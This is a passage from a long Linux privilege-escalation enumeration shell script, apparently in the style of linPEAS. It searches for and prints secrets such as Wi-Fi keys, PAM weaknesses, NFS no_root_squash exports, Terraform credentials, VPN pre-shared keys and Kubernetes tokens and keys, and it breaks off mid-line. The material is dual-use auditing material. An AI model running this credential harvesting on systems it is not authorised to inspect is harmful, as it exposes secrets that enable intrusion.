2>/dev/null | grep -IEv "^$" | grep -E "psk.*|password.*|ssid.*" | sed -${E} "s,psk.*|password.*|ssid.*,${SED_RED},g"; done; echo "";done; echo ""; 10271 fi 10272 10273 10274 if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then 10275 print_2title "Analyzing PAM Auth Files (limit 70)" 10276 if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E} "s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so" | grep -Ev "^#|^@" | sed -${E} "s,nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so,${SED_RED},g"; done; echo "";done; echo ""; 10277 fi 10278 10279 10280 if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then 10281 print_2title "Analyzing NFS Exports Files (limit 70)" 10282 nfsmounts=`cat /proc/mounts 2>/dev/null | grep nfs`; if [ "$nfsmounts" ]; then echo -e "Connected NFS Mounts: \n$nfsmounts"; fi 10283 if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure|rw|nohide,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; 10284 fi 10285 10286 10287 if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then 10288 print_2title "Analyzing GlusterFS Files (limit 70)" 10289 if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.pem$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.pem$,${SED_RED},"; done; echo ""; 10290 if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.ca$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.ca"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.ca$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.ca$,${SED_RED},"; done; echo ""; 10291 if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.key"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.key$,${SED_RED},"; done; echo ""; 10292 fi 10293 10294 10295 if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then 10296 print_2title "Analyzing Anaconda ks Files (limit 70)" 10297 if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; 10298 fi 10299 10300 10301 if [ "$PSTORAGE_TERRAFORM" ] || [ "$DEBUG" ]; then 10302 print_2title "Analyzing Terraform Files (limit 70)" 10303 if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tfstate$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tfstate"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tfstate$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tfstate$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*,${SED_RED},g"; done; echo ""; 10304 if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tf"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tf$,${SED_RED},"; done; echo ""; 10305 if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"credentials\.tfrc\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.tfrc.json"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "credentials\.tfrc\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.tfrc\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10306 fi 10307 10308 10309 if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then 10310 print_2title "Analyzing Racoon Files (limit 70)" 10311 if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; 10312 if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10313 fi 10314 10315 10316 if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then 10317 print_2title "Analyzing Kubernetes Files (limit 70)" 10318 (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED}," 10319 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubeconfig.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*kubeconfig*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubeconfig.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:|impersonate,${SED_RED},g"; done; echo ""; 10320 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"admin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "admin.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "admin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,admin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo ""; 10321 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"bootstrap-kubelet\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bootstrap-kubelet.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "bootstrap-kubelet\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bootstrap-kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo ""; 10322 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo ""; 10323 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";done; echo ""; 10324 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "manifests" | while read ff; do ls -ld "$ff" | sed -${E} "s,manifests,${SED_RED},"; find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(advertise-address|anonymous-auth|authorization|authorization-config|audit|encryption-provider-config|service-account|client-ca-file|kubelet-client|etcd|secure-port)|hostPath:|hostNetwork:|privileged:|serviceAccountName:|image:|command:|mountPath:,${SED_RED},g"; done; echo "";find "$f" -name "*.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(advertise-address|anonymous-auth|authorization|authorization-config|audit|encryption-provider-config|service-account|client-ca-file|kubelet-client|etcd|secure-port)|hostPath:|hostNetwork:|privileged:|serviceAccountName:|image:|command:|mountPath:,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "pki" | while read ff; do ls -ld "$ff" | sed -${E} "s,pki,${SED_RED},"; find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*encryption*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,encryption.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,providers:|aescbc:|aesgcm:|secretbox:|kms:|key:|name:|endpoint:,${SED_RED},g"; done; echo "";find "$f" -name "*audit*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,audit.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,level:|resources:|verbs:|users:|omitStages:|webhook:|path:,${SED_RED},g"; done; echo "";find "$f" -name "*webhook*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,webhook.*.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|url:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|exec:,${SED_RED},g"; done; echo "";done; echo ""; 10325 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,authentication:|authorization:|anonymous:|webhook:|readOnlyPort:|tlsCertFile:|tlsPrivateKeyFile:|staticPodPath:|podPidsLimit:|featureGates:|serverTLSBootstrap:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,--(bootstrap-kubeconfig|kubeconfig|config|container-runtime-endpoint|pod-infra-container-image|image-credential-provider-config|image-credential-provider-bin-dir),${SED_RED},g"; done; echo "";find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "pki" | while read ff; do ls -ld "$ff" | sed -${E} "s,pki,${SED_RED},"; find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~secret,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~projected" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~projected,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";find "$f" -name "kubernetes.io~csi" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubernetes.io~csi,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";done; echo ""; 10326 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kube-proxy$,${SED_RED},"; find "$f" -name "config.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,clientConnection:|kubeconfig:|server:|certificate-authority:|token:|mode:|metricsBindAddress:|healthzBindAddress:,${SED_RED},g"; done; echo "";find "$f" -name "kubeconfig.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";done; echo ""; 10327 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes\.io$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes.io"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes\.io$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes\.io$,${SED_RED},"; find "$f" -name "serviceaccount" | while read ff; do ls -ld "$ff" | sed -${E} "s,serviceaccount,${SED_RED},"; find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "namespace" | while read ff; do ls -ld "$ff" | sed -${E} "s,namespace,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "ca.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,ca.crt,${SED_RED},"; done; echo "";done; echo "";done; echo ""; 10328 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"net\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "net.d"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "net\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,net\.d$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,type|delegate|kubeconfig|token|certificate|key|endpoint|apiRoot|etcd,${SED_RED},g"; done; echo "";find "$f" -name "*.conflist" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conflist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,type|delegate|kubeconfig|token|certificate|key|endpoint|apiRoot|etcd,${SED_RED},g"; done; echo "";done; echo ""; 10329 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"containerd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "containerd"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "containerd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,containerd$,${SED_RED},"; find "$f" -name "config.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,registry|auth|username|password|token|cert|key|endpoint|sandbox_image|privileged|plugins,${SED_RED},g"; done; echo "";find "$f" -name "hosts.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,hosts.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server|capabilities|ca|client|skip_verify|auth,${SED_RED},g"; done; echo "";done; echo ""; 10330 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"crio$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crio"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "crio$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crio$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,auth|username|password|token|cert|key|registry|endpoint|pause_image|pinns_path|conmon,${SED_RED},g"; done; echo "";done; echo ""; 10331 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"etcd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "etcd"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "etcd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,etcd$,${SED_RED},"; find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";find "$f" -name "*.db" | while read ff; do ls -ld "$ff" | sed -${E} "s,.db,${SED_RED},"; done; echo "";find "$f" -name "db" | while read ff; do ls -ld "$ff" | sed -${E} "s,db,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,listen-client-urls|listen-peer-urls|advertise-client-urls|cert-file|key-file|trusted-ca-file|client-cert-auth|auto-tls|peer-auto-tls,${SED_RED},g"; done; echo "";done; echo ""; 10332 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"origin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "origin"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "origin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,origin$,${SED_RED},"; find "$f" -name "*.kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,.kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:|oauth,${SED_RED},g"; done; echo "";done; echo ""; 10333 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"k0s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "k0s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "k0s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,k0s$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:|tokenFile:|exec:|command:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo ""; 10334 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"k3s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "k3s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "k3s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,k3s$,${SED_RED},"; find "$f" -name "k3s.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,k3s.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo ""; 10335 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"rke2$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rke2"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "rke2$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rke2$,${SED_RED},"; find "$f" -name "rke2.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,rke2.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "token" | while read ff; do ls -ld "$ff" | sed -${E} "s,token,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.pem" | while read ff; do ls -ld "$ff" | sed -${E} "s,.pem,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo ""; 10336 if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"microk8s$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "microk8s"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "microk8s$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,microk8s$,${SED_RED},"; find "$f" -name "*.config" | while read ff; do ls -ld "$ff" | sed -${E} "s,.config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|certificate-authority-data:|client-certificate-data:|client-key-data:|token:,${SED_RED},g"; done; echo "";find "$f" -name "known_tokens.csv" | while read ff; do ls -ld "$ff" | sed -${E} "s,known_tokens.csv,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; done; echo "";find "$f" -name "*.crt" | while read ff; do ls -ld "$ff" | sed -${E} "s,.crt,${SED_RED},"; done; echo "";find "$f" -name "*.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:|server:|client-certificate-data:|client-key-data:|encryption|audit|etcd|service-account|hostPath:|privileged:,${SED_RED},g"; done; echo "";done; echo ""; 10337 fi 10338 10339 10340 if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then 10341 print_2title "Analyzing VNC Files (limit 70)" 10342 if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; 10343 if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" 